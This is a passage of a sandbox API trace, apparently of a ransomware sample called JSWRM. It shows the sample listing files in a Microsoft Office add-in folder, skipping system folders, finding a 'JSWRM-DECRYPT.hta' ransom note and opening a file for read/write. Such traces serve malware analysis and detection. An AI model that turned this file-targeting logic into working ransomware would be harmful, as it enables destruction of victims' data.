lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0124.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0124.816] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ms\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42fef17, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15ab259c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x410ca9bb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231ec0 [0124.819] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0124.819] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42fef17, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15ab259c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x410ca9bb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0124.819] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0124.819] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0124.819] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42fef17, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42fef17, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x15b24c93, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc3ec0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0124.819] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0124.819] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0124.819] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0124.819] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0124.820] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0124.820] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0124.822] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0124.822] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.822] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0124.822] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0124.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0124.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241218, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0124.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0124.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241178, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0124.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0124.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0124.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0124.822] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x410ca9bb, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x410ca9bb, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x410f0c0e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0124.822] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0124.822] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0124.822] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0124.822] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0124.822] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0124.822] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0124.822] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0124.822] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0124.822] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0124.822] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0124.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0124.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0124.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0124.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0124.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0124.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0124.823] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8719376, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x8719376, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8719376, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11ac0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0124.823] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0124.823] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0124.823] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0124.823] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0124.823] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0124.823] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0124.823] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0124.823] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.823] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0124.823] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0124.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0124.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0124.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0124.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0124.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0124.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0124.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.824] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x61fe8c4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x61fe8c4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6224b6a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12ad8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0124.824] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0124.824] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0124.824] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0124.824] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0124.824] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0124.824] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0124.824] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0124.824] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.824] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0124.824] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0124.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0124.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0124.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d728, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0124.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0124.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0124.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d920, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0124.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f4d0 [0124.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0124.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0124.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0124.824] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16be2c7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16be2c7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16be2c7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4ec0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0124.824] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0124.824] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0124.824] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0124.824] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0124.824] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0124.824] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0124.824] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0124.825] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.825] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0124.825] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0124.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0124.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0124.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d770, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0124.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0124.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0124.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d920, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0124.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f030 [0124.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0124.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0124.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0124.825] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x15ab259c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15ab259c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15ad884b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4e046, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.ms.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0124.825] lstrcmpiW (lpString1="PowerViewRes.ms.xap", lpString2=".") returned 1 [0124.825] lstrcmpiW (lpString1="PowerViewRes.ms.xap", lpString2="..") returned 1 [0124.825] lstrcmpiW (lpString1="PowerViewRes.ms.xap", lpString2="...") returned 1 [0124.825] lstrcmpiW (lpString1="PowerViewRes.ms.xap", lpString2="windows") returned -1 [0124.825] lstrcmpiW (lpString1="PowerViewRes.ms.xap", lpString2="recovery") returned -1 [0124.825] lstrcmpiW (lpString1="PowerViewRes.ms.xap", lpString2="perflogs") returned 1 [0124.825] lstrcmpiW (lpString1="PowerViewRes.ms.xap", lpString2="documents and settings") returned 1 [0124.825] lstrcmpiW (lpString1="PowerViewRes.ms.xap", lpString2="$RECYCLE.BIN") returned 1 [0124.825] lstrcmpiW (lpString1="PowerViewRes.ms.xap", lpString2="system volume information") returned -1 [0124.825] lstrcmpiW (lpString1="PowerViewRes.ms.xap", lpString2="msocache") returned 1 [0124.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0124.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ms.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0124.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ms.xap", cchWideChar=19, lpMultiByteStr=0x240f20, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.ms.xap", lpUsedDefaultChar=0x0) returned 19 [0124.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0124.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ms.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0124.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ms.xap", cchWideChar=19, lpMultiByteStr=0x241178, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.ms.xap", lpUsedDefaultChar=0x0) returned 19 [0124.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0124.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0124.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0124.826] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ms\\PowerViewRes.ms.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ms\\powerviewres.ms.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0124.827] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=319558) returned 1 [0124.828] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 